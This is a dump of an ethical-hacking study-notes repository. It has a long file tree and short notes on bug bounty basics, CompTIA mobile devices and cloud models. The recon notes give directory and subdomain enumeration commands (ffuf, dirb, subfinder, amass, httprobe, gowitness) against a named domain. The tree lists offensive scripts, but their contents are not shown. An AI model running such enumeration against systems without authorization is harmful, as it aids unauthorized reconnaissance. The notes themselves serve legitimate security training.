├── Assets ├── data_sec_lifecycle.png ├── deployment_model_effects.png ├── deployment_models.png ├── devops_ci.png ├── htb-osi-tcpip.png ├── hybrid_cloud.png ├── iaas.jpg ├── immutable_images.png ├── impact_on_traditional_controls.png ├── monitoring_plane.png ├── nist_model_cloud.jpg ├── prev_audit_results.png ├── secure_design_and_dev.png ├── security_impact_model.png ├── service_model_effects.png ├── shared_responsibilities.png ├── simplified_infra_comp.png ├── ssdlc.png ├── third_party_security_tools.png ├── underlying_iaas_networks.png └── vol_storage_encryption.png ├── BugBounty_TCMSec ├── AuthenticationAuthorization │ └── README.md ├── Automated │ └── README.md ├── Injection │ └── README.md ├── Intro │ └── README.md ├── Others │ └── README.md ├── README.md ├── Recon │ └── README.md └── Reporting │ └── README.md ├── CCNA ├── Images │ ├── Task1.png │ ├── Task10.jpeg │ ├── Task11.jpeg │ ├── Task12.jpeg │ ├── Task13.jpeg │ ├── Task14.jpeg │ ├── Task2.png │ ├── Task3.png │ ├── Task4.png │ ├── Task5.png │ ├── Task6.png │ ├── Task7.png │ ├── Task8.png │ ├── Task9.jpeg │ ├── ipv4-ipv6-headers.png │ ├── osi-tcpip.png │ ├── post-root-election.jpg │ └── pre-root-election.jpg └── README.md ├── CTFCheatsheet.md ├── CloudSecurity ├── CloudSecOps │ └── README.md ├── DataSecCloud │ └── README.md ├── InfraSecCloud │ └── README.md ├── IntroCloud │ └── README.md ├── ManagingCloudSec │ └── README.md ├── README.md └── SecureCloudApp │ └── README.md ├── CompTIA_220-1001 ├── Hardware │ └── README.md ├── MobileDevices │ └── README.md ├── Networking │ └── README.md ├── README.md ├── Troubleshooting │ └── README.md └── Virtualization │ └── README.md ├── CompTIA_220-1002 ├── OperatingSystems │ └── README.md ├── OperationalProcedures │ └── README.md ├── README.md ├── Security │ └── README.md └── SoftwareTroubleshooting │ └── README.md ├── CompTIA_N10-007 ├── Infrastructure │ └── README.md ├── NetworkOperations │ └── README.md ├── NetworkSecurity │ └── README.md ├── 
NetworkTroubleshooting │ └── README.md ├── NetworkingConcepts │ └── README.md └── README.md ├── CybersecurityAnalyst ├── Capstone │ └── README.md ├── CyberCompliance │ └── README.md ├── CyberRolesProcesses │ └── README.md ├── CyberThreatIntel │ └── README.md ├── IntroCyberToolsAttacks │ └── README.md ├── NetworkSecurity │ └── README.md ├── Pentesting │ └── README.md └── README.md ├── HTBAcademy ├── Bash │ └── README.md ├── BrokenAuthentication │ ├── README.md │ ├── basic_bruteforce.py │ ├── cookie_tampering.py │ ├── final_skill_assessment_bruteforce.py │ ├── passwd_policy_req.txt │ ├── predictable_questions.py │ ├── rate_limit_check.py │ ├── reset_token_time.py │ ├── timing.py │ └── username_injection.py ├── CommandInjections │ └── README.md ├── CommonApplications │ └── README.md ├── CommonServices │ └── README.md ├── FileInclusion │ └── README.md ├── FileTransfers │ └── README.md ├── FileUpload │ └── README.md ├── Footprinting │ ├── README.md │ └── enum-method3.png ├── HardwareAttacks │ └── README.md ├── InfoWeb │ └── README.md ├── IntroNetworking │ └── README.md ├── JSDeobfuscation │ └── README.md ├── LinuxPrivesc │ └── README.md ├── LoginBruteForce │ └── README.md ├── MetasploitFramework │ └── README.md ├── NetworkTrafficIntro │ └── README.md ├── PasswordAttacks │ └── README.md ├── README.md ├── SQLMap │ └── README.md ├── SQLi │ └── README.md ├── ServerSide │ └── README.md ├── SessionSecurity │ └── README.md ├── ShellsPayloads │ └── README.md ├── VulnerabilityAssessment │ └── README.md ├── WebAPIAttacks │ └── README.md ├── WebAttacks │ └── README.md ├── WindowsFundamentals │ └── README.md ├── WindowsPrivesc │ └── README.md ├── WordPress │ └── README.md ├── XSS │ └── README.md ├── ffuf │ └── README.md ├── hashcat │ └── README.md └── nmap │ └── README.md ├── HackTheBox ├── Academy.md ├── Access.md ├── Active.md ├── Analytics.md ├── Appointment.md ├── Archetype.md ├── Arctic.md ├── Armageddon.md ├── Base.md ├── Bashed.md ├── Bastard.md ├── Bastion.md ├── Beep.md 
├── Bike.md ├── Bizness.md ├── Blocky.md ├── Blue.md ├── Blunder.md ├── Buff.md ├── Busqueda.md ├── Cap.md ├── Chatterbox.md ├── Cicada.md ├── Crocodile.md ├── Cronos.md ├── Curling.md ├── Dancing.md ├── Devel.md ├── EmdeeFive.md ├── Explosion.md ├── Forest.md ├── Grandpa.md ├── Heist.md ├── Horizontall.md ├── Ignition.md ├── Included.md ├── Jeeves.md ├── Jerry.md ├── Keeper.md ├── Knife.md ├── Lame.md ├── Legacy.md ├── Markup.md ├── Mirai.md ├── Mongod.md ├── Netmon.md ├── Nibbles.md ├── Oopsie.md ├── OpenAdmin.md ├── Optimum.md ├── Paper.md ├── Pennyworth.md ├── Photobomb.md ├── Popcorn.md ├── Precious.md ├── Preignition.md ├── Previse.md ├── Querier.md ├── README.md ├── Redeemer.md ├── Resolute.md ├── Responder.md ├── Sau.md ├── Sauna.md ├── SecNotes.md ├── Sequel.md ├── ServMon.md ├── Shocker.md ├── Shoppy.md ├── Synced.md ├── Tactics.md ├── Three.md ├── Traceback.md ├── Unified.md ├── Vaccine.md ├── Valentine.md └── Wifinetic.md ├── LearnEthicalHackingFromScratch_Udemy ├── GainingAccess │ └── README.md ├── NetworkHacking │ └── README.md ├── PostExploitation │ └── README.md ├── README.md ├── WebsiteHacking │ └── README.md └── autoit-download-and-execute.txt ├── Linux101_TCMSec ├── Filesystem │ └── README.md ├── Intro │ └── README.md ├── Process │ └── README.md ├── README.md ├── RegexScripting │ └── README.md ├── Shells │ └── README.md ├── Software │ └── README.md ├── UsersGroups │ └── README.md └── Utilities │ └── README.md ├── LinuxPrivilegeEscalation_TCMSec ├── Capstone │ └── README.md ├── EscalationPaths │ └── README.md ├── InitialEnum │ └── README.md └── README.md ├── MPP_TCMSec ├── C2 │ └── README.md ├── DomainEnum │ └── README.md ├── EnumPrivescPersistence │ └── README.md ├── Foothold │ └── README.md ├── MPPDomain │ └── README.md └── README.md ├── MalwareAnalysis_TCMSec ├── AdvancedDynamicAnalysis │ └── README.md ├── AdvancedStaticAnalysis │ └── README.md ├── AnalysingGoMalware │ └── README.md ├── Automation │ └── README.md ├── BasicDynamicAnalysis │ └── 
README.md ├── BasicStaticAnalysis │ └── README.md ├── BinaryPatching │ └── README.md ├── Challenge1 │ └── README.md ├── Challenge2 │ └── README.md ├── LabSetup │ └── README.md ├── MaldocAnalysis │ └── README.md ├── MobileMalware │ └── README.md ├── README.md ├── RealworldMalware │ └── README.md ├── ReversingC#Malware │ └── README.md ├── RulesReports │ └── README.md ├── ScriptedMalwareDelivery │ └── README.md ├── ShellcodeAnalysis │ └── README.md └── SpecialtyMalwareClasses │ └── README.md ├── MobilePentest_TCMSec ├── AndroidDA │ └── README.md ├── AndroidSA │ └── README.md ├── Intro │ └── README.md ├── README.md ├── iosDA │ └── README.md └── iosSA │ └── README.md ├── OSINT_TCMSec ├── Intro │ └── README.md ├── OSINT │ └── README.md ├── README.md └── Tools │ └── README.md ├── Pentest_TCMSec ├── Intro │ └── README.md ├── PentestFindings │ └── README.md ├── PentestMethodology │ └── README.md └── README.md ├── PortSwigger ├── Advanced │ └── README.md ├── Client-side │ └── README.md ├── Labs │ └── README.md ├── README.md └── Server-side │ ├── README.md │ └── SQLi.md ├── PracticalEthicalHacking_TCMSec ├── ActiveDirectory │ └── README.md ├── Capstone │ └── README.md ├── ExploitDevelopment │ └── README.md ├── ExploitationBasics │ └── README.md ├── Linux │ └── README.md ├── Networking │ └── README.md ├── OWASPJuiceShop │ └── README.md ├── PostExploitation │ └── README.md ├── Python │ └── README.md ├── README.md ├── Recon │ └── README.md ├── ScanAndEnum │ └── README.md ├── WebAppEnum │ └── README.md └── WirelessPentest │ └── README.md ├── Python101_TCMSec ├── ExtendingPython │ └── README.md ├── Python101 │ └── README.md ├── README.md ├── restricted-sql-injection.py ├── sha256-cracking.py ├── sql-injection.py ├── ssh-bruteforce.py └── weblogin-bruteforce.py ├── Python201_TCMSec ├── ExtendingPython │ └── README.md ├── OOP │ └── README.md ├── Python201 │ └── README.md ├── README.md ├── WindowsAPI │ └── README.md ├── buffer_overflow.py ├── encrypted_bind_shell.py ├── keylogger.py 
├── proc_shellcode.py └── remote_dll_injection.py ├── README.md ├── TryHackMe ├── CompleteBeginner │ └── README.md ├── JrPentester │ └── README.md ├── PreSecurity │ └── README.md ├── README.md └── Rooms │ ├── AVEvasion.md │ ├── AbusingWindowsInternals.md │ ├── ActiveDirectoryBasics.md │ ├── AdventOfCyber1.md │ ├── AdventOfCyber2.md │ ├── AdventOfCyber3.md │ ├── AdventureTime.md │ ├── AgentSudo.md │ ├── AgentT.md │ ├── Alfred.md │ ├── Annie.md │ ├── Anonforce.md │ ├── Anonymous.md │ ├── Anthem.md │ ├── Archangel.md │ ├── Athena.md │ ├── Atlas.md │ ├── AttackingKerberos.md │ ├── AttacktiveDirectory.md │ ├── Badbyte.md │ ├── Battery.md │ ├── Biohazard.md │ ├── Blog.md │ ├── BoilerCTF.md │ ├── BountyHacker.md │ ├── Brainstorm.md │ ├── BreachingAD.md │ ├── BreakOutTheCage.md │ ├── BricksHeist.md │ ├── Brim.md │ ├── BruteIt.md │ ├── BufferOverflowPrep.md │ ├── BypassingUAC.md │ ├── CMesS.md │ ├── CatPictures.md │ ├── CheeseCTF.md │ ├── Chronicle.md │ ├── ColddBox.md │ ├── Committed.md │ ├── ConvertMyVideo.md │ ├── Couch.md │ ├── CrackTheHash.md │ ├── CrackTheHashLevel2.md │ ├── Creative.md │ ├── CyberLens.md │ ├── Cyborg.md │ ├── DAST.md │ ├── DailyBugle.md │ ├── DataExfiltration.md │ ├── Dav.md │ ├── Debug.md │ ├── Disgruntled.md │ ├── DiskAnalysisAutopsy.md │ ├── DissectingPEHeaders.md │ ├── EasyPeasy.md │ ├── Empline.md │ ├── EnumeratingAD.md │ ├── Enumeration.md │ ├── EvadingLoggingandMonitoring.md │ ├── ExploitingAD.md │ ├── Expose.md │ ├── Firewalls.md │ ├── FowsniffCTF.md │ ├── Gallery.md │ ├── GameZone.md │ ├── GamingServer.md │ ├── GoldenEye.md │ ├── HAJokerCTF.md │ ├── HackPark.md │ ├── HackerVsHacker.md │ ├── HackingWithPowerShell.md │ ├── Heartbleed.md │ ├── Holo.md │ ├── Ignite.md │ ├── Inferno.md │ ├── IntroC2.md │ ├── IntroMalwareAnalysis.md │ ├── IntroductionToCryptography.md │ ├── InvestigatingWindows.md │ ├── JackOfAllTrades.md │ ├── JacobTheBoss.md │ ├── JurassicPark.md │ ├── KAPE.md │ ├── Kiba.md │ ├── LazyAdmin.md │ ├── Lian_Yu.md │ ├── Library.md │ 
├── LinuxForensics.md │ ├── LivingOffTheLand.md │ ├── LookingGlass.md │ ├── MadeyeCastle.md │ ├── Madness.md │ ├── MalwareIntroductory.md │ ├── Mnemonic.md │ ├── MrRobotCTF.md │ ├── Mustacchio.md │ ├── NetworkSecuritySolutions.md │ ├── NewHireOldArtifacts.md │ ├── ObfuscationPrinciples.md │ ├── OhMyWebServer.md │ ├── OhSINT.md │ ├── Ollie.md │ ├── Olympus.md │ ├── Osquery.md │ ├── OsqueryBasics.md │ ├── Overpass.md │ ├── Overpass2Hacked.md │ ├── PasswordAttacks.md │ ├── PersistingAD.md │ ├── Phishing.md │ ├── Plotted-TMS.md │ ├── PostExploitationBasics.md │ ├── Poster.md │ ├── PrintNightmare.md │ ├── PrintNightmareAgain.md │ ├── PrintNightmareThrice.md │ ├── Publisher.md │ ├── README.md │ ├── REMnux.md │ ├── RazorBlack.md │ ├── RedTeamRecon.md │ ├── Redline.md │ ├── Relevant.md │ ├── Res.md │ ├── Retro.md │ ├── Road.md │ ├── RootMe.md │ ├── RuntimeDetectionEvasion.md │ ├── SafeZone.md │ ├── SakuraRoom.md │ ├── SearchlightIMINT.md │ ├── SignatureEvasion.md │ ├── Skynet.md │ ├── SmagGrotto.md │ ├── SolarLog4j.md │ ├── Source.md │ ├── Strings.md │ ├── Subscribe.md │ ├── Sustah.md │ ├── Sweettooth.md │ ├── Sysmon.md │ ├── TacticalDetection.md │ ├── Tempest.md │ ├── TheBlobBlog.md │ ├── Thompson.md │ ├── ThreatIntelTools.md │ ├── TokyoGhoul.md │ ├── ToolsRus.md │ ├── UltraTech.md │ ├── Unattended.md │ ├── Valley.md │ ├── Velociraptor.md │ ├── VulnNet.md │ ├── VulnNetRoasted.md │ ├── Warzone1.md │ ├── Warzone2.md │ ├── Watcher.md │ ├── WebOSINT.md │ ├── Wekor.md │ ├── WgelCTF.md │ ├── Willow.md │ ├── WindowsForensics1.md │ ├── WindowsForensics2.md │ ├── WindowsHardening.md │ ├── WindowsInternals.md │ ├── WindowsLocalPersistence.md │ ├── WindowsPrivilegeEscalation.md │ ├── WiresharkTrafficAnalysis.md │ ├── Wonderland.md │ ├── Wreath.md │ ├── YearOfTheRabbit.md │ ├── Zeek.md │ ├── ZeekExercises.md │ ├── ZeroLogon.md │ ├── c4ptur3-th3-fl4g.md │ ├── dogcat.md │ ├── ffuf.md │ ├── h4cked.md │ ├── simplectf.md │ └── tomghost.md ├── WindowsPrivilegeEscalation_TCMSec ├── Capstone 
│ └── README.md ├── EscalationPaths │ └── README.md ├── InitialEnum │ └── README.md └── README.md └── picoCTF ├── LearningGuides └── README.md ├── README.md └── picoGym └── README.md /Assets/data_sec_lifecycle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/data_sec_lifecycle.png -------------------------------------------------------------------------------- /Assets/deployment_model_effects.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/deployment_model_effects.png -------------------------------------------------------------------------------- /Assets/deployment_models.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/deployment_models.png -------------------------------------------------------------------------------- /Assets/devops_ci.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/devops_ci.png -------------------------------------------------------------------------------- /Assets/htb-osi-tcpip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/htb-osi-tcpip.png -------------------------------------------------------------------------------- /Assets/hybrid_cloud.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/hybrid_cloud.png -------------------------------------------------------------------------------- /Assets/iaas.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/iaas.jpg -------------------------------------------------------------------------------- /Assets/immutable_images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/immutable_images.png -------------------------------------------------------------------------------- /Assets/impact_on_traditional_controls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/impact_on_traditional_controls.png -------------------------------------------------------------------------------- /Assets/monitoring_plane.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/monitoring_plane.png -------------------------------------------------------------------------------- /Assets/nist_model_cloud.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/nist_model_cloud.jpg -------------------------------------------------------------------------------- /Assets/prev_audit_results.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/prev_audit_results.png -------------------------------------------------------------------------------- /Assets/secure_design_and_dev.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/secure_design_and_dev.png -------------------------------------------------------------------------------- /Assets/security_impact_model.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/security_impact_model.png -------------------------------------------------------------------------------- /Assets/service_model_effects.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/service_model_effects.png -------------------------------------------------------------------------------- /Assets/shared_responsibilities.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/shared_responsibilities.png -------------------------------------------------------------------------------- /Assets/simplified_infra_comp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/simplified_infra_comp.png -------------------------------------------------------------------------------- /Assets/ssdlc.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/ssdlc.png -------------------------------------------------------------------------------- /Assets/third_party_security_tools.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/third_party_security_tools.png -------------------------------------------------------------------------------- /Assets/underlying_iaas_networks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/underlying_iaas_networks.png -------------------------------------------------------------------------------- /Assets/vol_storage_encryption.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/vol_storage_encryption.png -------------------------------------------------------------------------------- /BugBounty_TCMSec/Automated/README.md: -------------------------------------------------------------------------------- 1 | # Automated Tools 2 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/Injection/README.md: -------------------------------------------------------------------------------- 1 | # Injection Attacks 2 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/Intro/README.md: -------------------------------------------------------------------------------- 1 | # Introduction 2 | 3 | * Web app security - best practices: 4 | 5 | * Regular 
patching & updates 6 | * Least privilege 7 | * Secure code 8 | * Secure data storage 9 | * MFA 10 | * Logging & monitoring 11 | * User training 12 | 13 | * HTTP - stateless request-response protocol; common HTTP methods include GET, POST, PUT and DELETE 14 | 15 | * HTTP response codes: 16 | 17 | * 1xx - Informational 18 | * 2xx - Successful 19 | * 3xx - Redirection 20 | * 4xx - Client errors 21 | * 5xx - Server errors 22 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/Others/README.md: -------------------------------------------------------------------------------- 1 | # Other Common Vulnerabilities 2 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/README.md: -------------------------------------------------------------------------------- 1 | # Practical Bug Bounty 2 | 3 | Notes for the TCM Security course [Practical Bug Bounty](https://academy.tcm-sec.com/p/practical-bug-bounty): 4 | 5 | 1. [Introduction](Intro/README.md) 6 | 1. [Reconnaissance](Recon/README.md) 7 | 1. [Authentication and Authorization Attacks](AuthenticationAuthorization/README.md) 8 | 1. [Injection Attacks](Injection/README.md) 9 | 1. [Automated Tools](Automated/README.md) 10 | 1. [Other Common Vulnerabilities](Others/README.md) 11 | 1. 
[Reporting](Reporting/README.md) 12 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/Recon/README.md: -------------------------------------------------------------------------------- 1 | # Reconnaissance 2 | 3 | * Fingerprinting web technologies: 4 | 5 | * [BuiltWith](https://builtwith.com/) 6 | * [Wappalyzer](https://www.wappalyzer.com/) 7 | * [Security Headers](https://securityheaders.com) 8 | 9 | * Directory enumeration: 10 | 11 | ```shell 12 | ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.0.0.10/FUZZ 13 | 14 | dirb http://10.0.0.10 15 | # scans recursively by default 16 | 17 | # can use other tools as well like dirbuster and gobuster 18 | ``` 19 | 20 | * Subdomain enumeration: 21 | 22 | ```shell 23 | # we can use resources like Google or crt.sh on web 24 | # but they give limited results 25 | 26 | subfinder -d azena.com -o azena.txt 27 | 28 | assetfinder azena.com 29 | 30 | assetfinder azena.com | grep azena.com | sort -u > azena-subdomains.txt 31 | # only print unique and required subdomains 32 | 33 | amass enum -d azena.com >> azena-subdomains.txt 34 | 35 | # after gathering all subdomains 36 | # need to check if they are up or not 37 | cat azena-subdomains.txt | grep azena.com | sort -u | httprobe -prefer-https | grep https > azena-alive.txt 38 | 39 | mkdir azenapics 40 | 41 | # screenshot automation for each page 42 | # need to remove 'https://' string from final subdomains file for gowitness to work 43 | gowitness file -f azena-alive.txt -P azenapics --no-http 44 | ``` 45 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/Reporting/README.md: -------------------------------------------------------------------------------- 1 | # Reporting 2 | -------------------------------------------------------------------------------- /CCNA/Images/Task1.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task1.png -------------------------------------------------------------------------------- /CCNA/Images/Task10.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task10.jpeg -------------------------------------------------------------------------------- /CCNA/Images/Task11.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task11.jpeg -------------------------------------------------------------------------------- /CCNA/Images/Task12.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task12.jpeg -------------------------------------------------------------------------------- /CCNA/Images/Task13.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task13.jpeg -------------------------------------------------------------------------------- /CCNA/Images/Task14.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task14.jpeg -------------------------------------------------------------------------------- /CCNA/Images/Task2.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task2.png -------------------------------------------------------------------------------- /CCNA/Images/Task3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task3.png -------------------------------------------------------------------------------- /CCNA/Images/Task4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task4.png -------------------------------------------------------------------------------- /CCNA/Images/Task5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task5.png -------------------------------------------------------------------------------- /CCNA/Images/Task6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task6.png -------------------------------------------------------------------------------- /CCNA/Images/Task7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task7.png -------------------------------------------------------------------------------- /CCNA/Images/Task8.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task8.png -------------------------------------------------------------------------------- /CCNA/Images/Task9.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task9.jpeg -------------------------------------------------------------------------------- /CCNA/Images/ipv4-ipv6-headers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/ipv4-ipv6-headers.png -------------------------------------------------------------------------------- /CCNA/Images/osi-tcpip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/osi-tcpip.png -------------------------------------------------------------------------------- /CCNA/Images/post-root-election.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/post-root-election.jpg -------------------------------------------------------------------------------- /CCNA/Images/pre-root-election.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/pre-root-election.jpg -------------------------------------------------------------------------------- 
/CloudSecurity/README.md: -------------------------------------------------------------------------------- 1 | # Cloud Security 2 | 3 | * Notes for the [Cloud Security](https://www.netacad.com/courses/cybersecurity/cloud-security) course on Cisco Networking Academy (CCSK-CSA). 4 | 5 | * Topics: 6 | 7 | * [Introduction to Cloud](IntroCloud/README.md) 8 | 9 | * [Infrastructure Security for Cloud](InfraSecCloud/README.md) 10 | 11 | * [Managing Cloud Security & Risk](ManagingCloudSec/README.md) 12 | 13 | * [Data Security for Cloud](DataSecCloud/README.md) 14 | 15 | * [Securing Cloud Applications, Users & Related Technologies](SecureCloudApp/README.md) 16 | 17 | * [Cloud Security Operations](CloudSecOps/README.md) 18 | -------------------------------------------------------------------------------- /CompTIA_220-1001/MobileDevices/README.md: -------------------------------------------------------------------------------- 1 | # Mobile Devices 2 | 3 | ## Laptop Hardware 4 | 5 | * Laptop computers tend to use solid-state drives, compared to desktop computers which prefer using hard drives. Hybrid drives are used as well. 6 | 7 | * Similarly, memory modules in laptops are smaller - common ones are SO-DIMM (Small Outline Dual In-line Memory Module) and Micro-DIMM. 8 | 9 | * The video cards are often built into the processor or the system board, and are non-upgradable. 10 | 11 | * The power conversion for laptops is done on an external device that provides DC power directly into the laptop. AC adapters are used to convert AC into DC. 12 | 13 | * The components used inside the laptop are designed for mobility and power management. 14 | 15 | ## Laptop Displays 16 | 17 | * Laptops usually use LCD (Liquid Crystal Display). It is lightweight, cheap and requires low power. However, black levels are a challenge. 18 | 19 | * OLED (Organic Light Emitting Diode) does not require backlight, unlike LCD. They are thinner and lighter. However they are costlier and consume more power. 
20 | 21 | * WiFi antennas are also used in laptop displays. 22 | 23 | * Backlighting can be either LED-backlit or fluoroscent. 24 | 25 | ## Laptop Features 26 | 27 | * Smaller keyboards and function toggles are typical laptop features. 28 | 29 | * Docking stations allow laptops to use external keyboard and mouse, or add additional functionality in general. 30 | 31 | ## Mobile Device 32 | 33 | * Designed for touch input, these are small-sized single-screened computers. 34 | 35 | ## Mobile Device Accessories 36 | 37 | * Mobile device connections are supported by accessories such as Micro-USB, Mini-USB and USB-C plugs. 38 | 39 | * Tethering is allowed by physically connecting a device to a phone to use Internet connection. WiFi hotspot does the same thing but it is wireless. 40 | 41 | * Bluetooth is a type of PAN (Personal Area Network) and it offers high speed communication over short distances. 42 | 43 | * Wired headsets are connected to the analog audio jack using TRRS (Tip-Ring-Ring-Sleeve) connector. 44 | 45 | * A SD or a microSD card can be used in phones to increase the storage capacity. 46 | 47 | ## Mobile Device Connectivity 48 | 49 | * Wireless networks used commonly on phones include cellular, WiFi and Bluetooth. 50 | 51 | * IMEI (International Mobile Station Equipment Identity) and IMSI (International Mobile Subscriber Identity) are used to identify the device and the user, respectively. 52 | 53 | * For older devices, retreiving mail used POP3 and IMAP, and sending mail used SMTP. For newer ones, commercial email providers are being used. 54 | 55 | ## Mobile Device Synchronization 56 | 57 | * We can synchronize our data to the cloud, a desktop computer or to other appliances. 
58 | -------------------------------------------------------------------------------- /CompTIA_220-1001/README.md: -------------------------------------------------------------------------------- 1 | # CompTIA A+ 220-1001 2 | 3 | Notes for the Professor Messer course [CompTIA A+ 220-1001 Training](https://www.professormesser.com/free-a-plus-training/220-1001/220-1000-training-course/). 4 | 5 | Topics: 6 | 7 | * [Mobile Devices](MobileDevices/README.md) 8 | 9 | * [Networking](Networking/README.md) 10 | 11 | * [Hardware](Hardware/README.md) 12 | 13 | * [Virtualization and Cloud Computing](Virtualization/README.md) 14 | 15 | * [Hardware and Network Troubleshooting](Troubleshooting/README.md) 16 | -------------------------------------------------------------------------------- /CompTIA_220-1001/Virtualization/README.md: -------------------------------------------------------------------------------- 1 | # Virtualization and Cloud Computing 2 | 3 | ## Cloud Computing 4 | 5 | * IaaS (Infrastructure as a Service) - compute, storage and networking are outsourced; the customer still manages the OS and everything above it. 6 | 7 | * SaaS (Software as a Service) - on-demand software; the provider runs the whole stack, the customer manages only its data and users. 8 | 9 | * PaaS (Platform as a Service) - develop and run applications on provider-managed platform modules (runtime, database, etc.). 10 | 11 | * Cloud deployment models - private, public, hybrid and community. 12 | 13 